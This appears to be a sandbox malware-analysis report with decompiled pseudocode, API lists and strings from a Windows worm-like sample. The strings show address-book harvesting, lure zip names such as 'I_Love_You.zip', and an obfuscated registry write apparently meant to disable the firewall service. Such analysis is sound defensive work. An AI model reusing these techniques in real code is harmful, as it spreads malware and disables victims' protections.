							_t55 =  *(_t70 +  &_v284) & 0x000000ff;
							_v285 = _t55;
							_t71 = 0;
							if(_t55 != 0) {
								 *(_t70 +  &_v284) = 0;
								_t58 = E1000128D(_v285, _t74, _t77, _v285);
								_t71 = 0;
								if(_t58 != 0) {
									 *((char*)(_t77 + _v285)) = 0;
									_t60 =  &_v284;
									_v312 = _t60;
									_v316 = 0x10006054;
									L10003560();
									_t80 = _t79 - 8;
									if(_t60 == 0) {
										_v320 = _t77;
										 *_t80 = 0x100060c4;
										L10003560();
										_t80 = _t80 - 8;
										_v286 = _v286 &  ~(_t60 & 0xffffff00 | _t60 != 0x00000000);
									}
									 *_t77 = _v286 << 0x00000008 | 0x00000001;
									_v316 = 2;
									_v320 = _t77;
									 *_t80 = _t74;
									_t64 = E10001236(_v286 << 0x00000008 | 0x00000001);
									_t71 = 0;
									if(_t64 != 0) {
										_t71 = (_t64 & 0xffffff00 | _v286 == 0x00000000) & 0x000000ff;
									}
								}
							}
						}
					}
				}
				return _t71;
			}

0x10001a64
0x10001a67
0x10001a6a
0x10001a6d
0x10001a70
0x10001a73
0x10001a89
0x10001a8e
0x10001a95
0x10001a9b
0x10001aac
0x10001ab3
0x10001ace
0x10001ad3
0x10001ada
0x10001ae3
0x10001aeb
0x10001af1
0x10001af8
0x10001b01
0x10001b1b
0x10001b20
0x10001b27
0x10001b34
0x10001b38
0x10001b3e
0x10001b42
0x10001b49
0x10001b4e
0x10001b53
0x10001b55
0x10001b59
0x10001b60
0x10001b65
0x10001b6f
0x10001b6f
0x10001b82
0x10001b85
0x10001b8d
0x10001b91
0x10001b94
0x10001b99
0x10001ba0
0x10001bac
0x10001bac
0x10001ba0
0x10001b27
0x10001af8
0x10001ada
0x10001ab3
0x10001bbd

APIs

sread.SHERVANS ref: 10001A89
sread.SHERVANS ref: 10001ACE
sread.SHERVANS ref: 10001B1B
lstrcmp.KERNEL32 ref: 10001B49
lstrcmp.KERNEL32 ref: 10001B60
swrite.SHERVANS ref: 10001B94

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: sread$lstrcmp$swrite
String ID:
API String ID: 1841987066-0
Opcode ID: 50c29eabb491e391b19f89d7d52041d898abba3f9a3e0c212c36fa54c6efb9ac
Instruction ID: 02893088ef83d42b468dfb49456edce95aa81bf5added6d024bd8f99ab7a1a41
Opcode Fuzzy Hash: 50c29eabb491e391b19f89d7d52041d898abba3f9a3e0c212c36fa54c6efb9ac
Instruction Fuzzy Hash: EF316D74D083589EE711DF2485423EEBFEAEF84380F44849ED99897285E738DA85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00401000(intOrPtr __ebx, intOrPtr __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v24;
				intOrPtr* _t16;
				intOrPtr* _t27;
				intOrPtr* _t33;
				intOrPtr* _t37;

				_v12 = __ebx;
				_t27 = 0;
				_v8 = __esi;
				_t33 = 0;
				_t16 =  *((intOrPtr*)( *_a4));
				if(_t16 > 0xc0000091) {
					__eflags = _t16 - 0xc0000094;
					if(__eflags == 0) {
						goto L3;
					} else {
						if(__eflags > 0) {
							__eflags = _t16 - 0xc0000096;
							goto L14;
						} else {
							__eflags = _t16 - 0xc0000093;
							if(_t16 == 0xc0000093) {
								goto L2;
							} else {
								return 0;
							}
						}
					}
				} else {
					if(_t16 < 0xc000008d) {
						__eflags = _t16 - 0xc0000005;
						if(_t16 == 0xc0000005) {
							 *_t37 = 0xb;
							_v24 = 0;
							L0040C198();
							__eflags = 0 - 1;
							if(0 == 1) {
								 *_t37 = 0xb;
								_v24 = 1;
								L0040C198();
								goto L6;
							} else {
								__eflags = 0;
								if(0 != 0) {
									 *_t37 = 0xb;
									 *0x00000000();
									goto L6;
								}
							}
						} else {
							__eflags = _t16 - 0xc000001d;
							L14:
							if(__eflags == 0) {
								 *_t37 = 4;
								_v24 = 0;
								L0040C198();
								__eflags = _t16 - 1;
								if(_t16 == 1) {
									 *_t37 = 4;
									_v24 = 1;
									L0040C198();
									goto L6;
								} else {
									__eflags = _t16;
									if(_t16 != 0) {
										 *_t37 = 4;
										 *_t16();
										goto L6;
									}
								}
							}
						}
					} else {
						L2:
						_t33 = 1;
						L3:
						 *_t37 = 8;
						_v24 = 0;
						L0040C198();
						if(_t16 == 1) {
							 *_t37 = 8;
							_v24 = 1;
							L0040C198();
							__eflags = _t33;
							if(_t33 != 0) {
								E0040B000(1);
							}
							goto L6;
						} else {
							if(_t16 != 0) {
								 *_t37 = 8;
								 *_t16();
								L6:
								_t27 = 0xffffffff;
							}
						}
					}
					return _t27;
				}
			}

0x00401006
0x0040100c
0x0040100e
0x00401013
0x00401015
0x0040101c
0x00401061
0x00401066
0x00000000
0x00401068
0x00401068
0x004010b4
0x00000000
0x0040106a
0x0040106a
0x0040106f
0x00000000
0x00401071
0x0040107c
0x0040107c
0x0040106f
0x00401068
0x0040101e
0x00401023
0x00401080
0x00401085
0x004010e2
0x004010eb
0x004010ef
0x004010f4
0x004010f7
0x00401129
0x00401135
0x00401139
0x00000000
0x004010f9
0x004010f9
0x004010fb
0x00401101
0x00401108
0x00000000
0x00401108
0x004010fb
0x00401087
0x00401087
0x0040108c
0x0040108c
0x0040108e
0x00401097
0x0040109b
0x004010a0
0x004010a3
0x0040110f
0x0040111b
0x0040111f
0x00000000
0x004010a5
0x004010a5
0x004010a7
0x004010a9
0x004010b0
0x00000000
0x004010b0
0x004010a7
0x004010a3
0x0040108c
0x00401025
0x00401025
0x00401025
0x0040102a
0x0040102a
0x00401033
0x00401037
0x0040103f
0x004010bb
0x004010c7
0x004010cb
0x004010d0
0x004010d2
0x004010d8
0x004010d8
0x00000000
0x00401041
0x00401043
0x00401045
0x0040104c
0x0040104e
0x0040104e
0x0040104e
0x00401043
0x0040103f
0x0040105e
0x0040105e

APIs

signal.MSVCRT ref: 00401037
signal.MSVCRT ref: 0040109B
signal.MSVCRT ref: 004010CB

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
Instruction ID: 6d904beb62735350cc8560cdbfd164d6d9336f8a3c982fff81a65fa89f770588
Opcode Fuzzy Hash: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
Instruction Fuzzy Hash: BC3125709042449BE720AF69C58032EB6E0BB49314F15893FD9C5EB7E2C67E8DC09B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC80 Relevance: 9.1, APIs: 6, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040BC80(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _v52;
				void* _t31;
				long _t34;
				void* _t35;
				void* _t36;
				intOrPtr* _t39;
				void* _t41;
				void* _t52;
				intOrPtr _t56;
				intOrPtr _t65;
				intOrPtr* _t67;
				long* _t68;
				intOrPtr* _t69;

				_v8 = __edi;
				_t60 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t63 =  *(_t60 + 0xc);
				if( *(_t60 + 0xc) == 0) {
					 *_t67 = _t60;
					return E0040B740();
				} else {
					_t31 =  *0x418284;
					if(_t31 == 0) {
						E0040B0E0(_t31);
						_t31 =  *0x418284;
					}
					_t49 =  *((intOrPtr*)(_t31 + 0x30));
					if( *((intOrPtr*)(_t31 + 0x30)) < 0) {
						E0040B3B0(_t49, _t63);
						_t31 =  *0x418284;
					}
					if( *((intOrPtr*)(_t31 + 0x30)) != 0) {
						_t34 = GetLastError();
						 *_t67 =  *((intOrPtr*)(_t31 + 0x2c));
						_t63 = _t34;
						_t35 = TlsGetValue(??);
						_t68 = _t67 - 4;
						 *_t68 = _t34;
						SetLastError(??);
						_t36 = _t35;
						_t67 = _t68 - 4;
					} else {
						_t36 =  *(_t31 + 0x28);
					}
					_v20 = _t36;
					_v24 = _t36;
					if(E0040B8D0(_t60,  &_v24) == 7) {
						_t41 =  *0x418284;
						_t52 = _v24;
						if(_t41 == 0) {
							E0040B0E0(_t41);
							_t41 =  *0x418284;
						}
						if( *((intOrPtr*)(_t41 + 0x30)) < 0) {
							E0040B3B0(_t52, _t63);
							_t41 =  *0x418284;
						}
						_t60 =  *((intOrPtr*)(_t41 + 0x30));
						if( *((intOrPtr*)(_t41 + 0x30)) != 0) {
							_v40 = _t52;
							 *_t67 =  *((intOrPtr*)(_t41 + 0x2c));
							if(TlsSetValue(??, ??) == 0) {
								GetLastError();
							}
						} else {
							 *((intOrPtr*)(_t41 + 0x28)) = _t52;
						}
						_t31 = _v24;
						_t65 =  *((intOrPtr*)(_t31 + 0x20));
						_t67 =  *((intOrPtr*)(_t31 + 0x28));
						goto __ecx;
					}
					abort();
					_push(_t65);
					_t69 = _t67 - 8;
					_t56 = _v40;
					_t39 =  *((intOrPtr*)(_t56 + 8));
					if(_t39 != 0) {
						_v52 = _t56;
						 *_t69 = 1;
						return  *_t39();
					} else {
						return _t39;
					}
				}
			}

0x0040bc86
0x0040bc89
0x0040bc8c
0x0040bc8f
0x0040bc92
0x0040bc97
0x0040bd12
0x0040bd26
0x0040bc99
0x0040bc99
0x0040bca0
0x0040bd06
0x0040bd0b
0x0040bd0b
0x0040bca2
0x0040bca7
0x0040bd81
0x0040bd86
0x0040bd86
0x0040bcb2
0x0040bd2a
0x0040bd30
0x0040bd33
0x0040bd35
0x0040bd3b
0x0040bd40
0x0040bd43
0x0040bd49
0x0040bd4b
0x0040bcb4
0x0040bcb4
0x0040bcb4
0x0040bcb7
0x0040bcbd
0x0040bcca
0x0040bcd0
0x0040bcd5
0x0040bcda
0x0040bd72
0x0040bd77
0x0040bd77
0x0040bce5
0x0040bd90
0x0040bd95
0x0040bd95
0x0040bceb
0x0040bcf0
0x0040bd56
0x0040bd5a
0x0040bd68
0x0040bd6a
0x0040bd6a
0x0040bcf2
0x0040bcf2
0x0040bcf2
0x0040bcf5
0x0040bcfe
0x0040bd01
0x0040bd04
0x0040bd04
0x0040bd9f
0x0040bdb0
0x0040bdb3
0x0040bdb6
0x0040bdb9
0x0040bdbe
0x0040bdc2
0x0040bdc6
0x0040bdd0
0x0040bdc1
0x0040bdc1
0x0040bdc1
0x0040bdbe

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD2A
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD35
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD43
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD5D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD6A
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD9F

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ErrorLast$Value$abort
String ID:
API String ID: 2626461348-0
Opcode ID: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
Instruction ID: 54ad4b7b80f31364e908b692a5ee0ad386bd410343df76c18df6e0f8c4ff5425
Opcode Fuzzy Hash: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
Instruction Fuzzy Hash: A0312A70A04609CFDB40EF65D680AAAB7B4FF48300B1585BED855AB391DB34AD01CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A73 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 64stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402A87

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402AAF
lstrcat.KERNEL32 ref: 00402AD1
lstrcat.KERNEL32 ref: 00402AEB
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402B10

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

Happy_birthday_to_you.zip, xrefs: 00402B05

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID: Happy_birthday_to_you.zip
API String ID: 1562643418-1870604427
Opcode ID: ab93de260d9d7b3f63fc38cf511f9f6f11fd8cbf9b2553f54f0ef4a6ba202e59
Instruction ID: cc83420afc5f1d077a3f5b7fbaa549a80263fd77f6117133aa0d2265757cdded
Opcode Fuzzy Hash: ab93de260d9d7b3f63fc38cf511f9f6f11fd8cbf9b2553f54f0ef4a6ba202e59
Instruction Fuzzy Hash: 3C21FF759043048BC710EF64D98169EBBF0EF84314F40897FE584A7341EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004029C9 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 64stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 004029DD

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402A05
lstrcat.KERNEL32 ref: 00402A27
lstrcat.KERNEL32 ref: 00402A41
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402A66

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

I_Love_You.zip, xrefs: 00402A5B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID: I_Love_You.zip
API String ID: 1562643418-69349870
Opcode ID: 247b01801a7c8732d276e468bcc8b3b88bf3ed5fd2371333381e1382a1eb55e6
Instruction ID: f9bbb920bae34a53852b7a8ae3bd8492a159d249183d5996932f43f3eb41e795
Opcode Fuzzy Hash: 247b01801a7c8732d276e468bcc8b3b88bf3ed5fd2371333381e1382a1eb55e6
Instruction Fuzzy Hash: 3A21DF759043048BCB11EF64D98169EBBF4EF84314F40897FE585A7381EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00401B7E Relevance: 9.1, APIs: 6, Instructions: 54fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00401B93
fopen.MSVCRT ref: 00401BA8
realloc.MSVCRT ref: 00401BCF
fread.MSVCRT ref: 00401BF5
??3@YAXPAX@Z.MSVCRT ref: 00401C14
fclose.MSVCRT ref: 00401C1C

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ??3@fclosefopenfreadmallocrealloc
String ID:
API String ID: 418953348-0
Opcode ID: cd82c47d2a0d14179ee5ff6a2821234b899268957919a795133ff3fc6cf18751
Instruction ID: 75d7d26d9218dbdf86978dcb23e5f4fbbd0c24693f44c664e0b05ab087c45b19
Opcode Fuzzy Hash: cd82c47d2a0d14179ee5ff6a2821234b899268957919a795133ff3fc6cf18751
Instruction Fuzzy Hash: 6E115A705087049BD300AF2AC4C475EFAE4EF44358F05893EE8C8AB3D2E77D98458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B040 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetAtomNameA.KERNEL32 ref: 0040B05F

Part of subcall function 0040C130: fprintf.MSVCRT ref: 0040C15D
Part of subcall function 0040C130: fflush.MSVCRT ref: 0040C16D
Part of subcall function 0040C130: abort.MSVCRT(?,?,?,?,?,0040B0BE), ref: 0040C172

Strings

w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 0040B097
../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 0040B0B0
GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 0040B0BE
%s:%u: failed assertion `%s', xrefs: 0040B0A9

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: AtomNameabortfflushfprintf
String ID: %s:%u: failed assertion `%s'$../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
API String ID: 2513348418-2696369246
Opcode ID: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
Instruction ID: b50ba6c1e0c48ccbfb779697640dc8edf1bacce25001569c98304d8c7ef809a2
Opcode Fuzzy Hash: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
Instruction Fuzzy Hash: E50152B0A043459BCB049F65C49426BBFE0EB98304F10C83FD999AB785D37DD8849B8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 004039A1
memset.MSVCRT ref: 004039CA
RegQueryValueExA.ADVAPI32 ref: 00403A08
RegCloseKey.ADVAPI32 ref: 00403A19

Part of subcall function 00403390: CreateFileA.KERNEL32 ref: 004033D2
Part of subcall function 00403390: GetFileSize.KERNEL32 ref: 00403409
Part of subcall function 00403390: CreateFileMappingA.KERNEL32 ref: 00403448
Part of subcall function 00403390: CloseHandle.KERNEL32 ref: 0040346E

Strings

Software\Microsoft\WAB\WAB4\Wab File Name, xrefs: 00403992

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$CloseCreate$HandleMappingOpenQuerySizeValuememset
String ID: Software\Microsoft\WAB\WAB4\Wab File Name
API String ID: 1684987478-619501371
Opcode ID: 693d4b3274321ff71e2d42a915d5b2b45d06d87ff800bc67c20065d722b332b6
Instruction ID: fb9affdcd003a3e7f59b61beff737c010c0f055de032600ad664b438ea4410d9
Opcode Fuzzy Hash: 693d4b3274321ff71e2d42a915d5b2b45d06d87ff800bc67c20065d722b332b6
Instruction Fuzzy Hash: EB119DB0804755DFD710EF25C98939FBBF4BB44348F40896EE88867381D7B996888F96

Uniqueness

Uniqueness Score: -1.00%

Function 00403E78 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403EC7
RegSetValueExA.ADVAPI32 ref: 00403F06
RegCloseKey.ADVAPI32 ref: 00403F17

Strings

Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff, xrefs: 00403E8C
Start, xrefs: 00403EF5

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CloseOpenValue
String ID: Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff$Start
API String ID: 779948276-912140713
Opcode ID: e296dfc2d9eb7ef9e349c09ed36716ed2307b031d9a666ead56965e2f71c0cc2
Instruction ID: 3e2d9bc1c4b7ca1d7eb8bd648e7caadb70e702096ae42ff705bea3b0919a5c49
Opcode Fuzzy Hash: e296dfc2d9eb7ef9e349c09ed36716ed2307b031d9a666ead56965e2f71c0cc2
Instruction Fuzzy Hash: 7101DBF0808315DBD710EF25C58575EBBF4BB44348F40C96DE988A7242E7789A4C8F56

Uniqueness

Uniqueness Score: -1.00%

Function 00405316 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405316(char* __ebx) {
				void* _v8;
				char _v76;
				intOrPtr _v88;
				int _t5;
				char* _t9;
				char* _t11;
				char* _t13;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr* _t16;
				char** _t17;

				_t15 = _t14 - 0x54;
				_v88 = 0x40;
				_t11 =  &_v76;
				 *_t15 = _t11;
				_t5 = gethostname(__ebx, ??);
				_t16 = _t15 - 8;
				 *_t16 = _t11;
				L004086D8();
				_t17 = _t16 - 4;
				_t13 = "192.168.1.2";
				if(_t5 != 0) {
					_t9 =  *( *( *(_t5 + 0xc)));
					 *_t17 = _t9;
					L004086E0();
					_t13 = _t9;
				}
				return _t13;
			}

0x0040531a
0x0040531d
0x00405325
0x00405328
0x0040532b
0x00405330
0x00405333
0x00405336
0x0040533b
0x0040533e
0x00405345
0x0040534c
0x0040534e
0x00405351
0x00405359
0x00405359
0x00405361

APIs

gethostname.WS2_32 ref: 0040532B
gethostbyname.WS2_32 ref: 00405336
inet_ntoa.WS2_32 ref: 00405351

Strings

192.168.1.2, xrefs: 0040533E
@, xrefs: 0040531D

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID: 192.168.1.2$@
API String ID: 289322838-3711723240
Opcode ID: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
Instruction ID: 9ec42d045907c7db8908afb764d072bf234eb471670fc80d8c874dbff0fee724
Opcode Fuzzy Hash: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
Instruction Fuzzy Hash: 7EE030B0A04B048FC700FF39C6C650ABBF4AF44348F06487DE986A7355EA38E9088B57

Uniqueness

Uniqueness Score: -1.00%

Function 10001451 Relevance: 7.6, APIs: 5, Instructions: 65
networkCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10001451(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, signed int _a4, intOrPtr _a8, signed int _a12, signed short _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed short _v30;
				intOrPtr _v56;
				short _v58;
				void _v60;
				int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				signed short* _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _t35;
				void* _t40;
				signed int _t51;
				signed int _t60;
				void* _t62;
				void* _t63;
				signed int* _t65;

				_v16 = __ebx;
				_v12 = __esi;
				_v8 = __edi;
				_t60 = _a12;
				_t35 = _a16 & 0x0000ffff;
				_v30 = _t35;
				_v84 = 0;
				_v88 = 1;
				_v92 = 2;
				L1000301C();
				_t63 = _t62 - 0xc;
				_t51 = _t35;
				if(_t35 != 0xffffffff) {
					asm("cld");
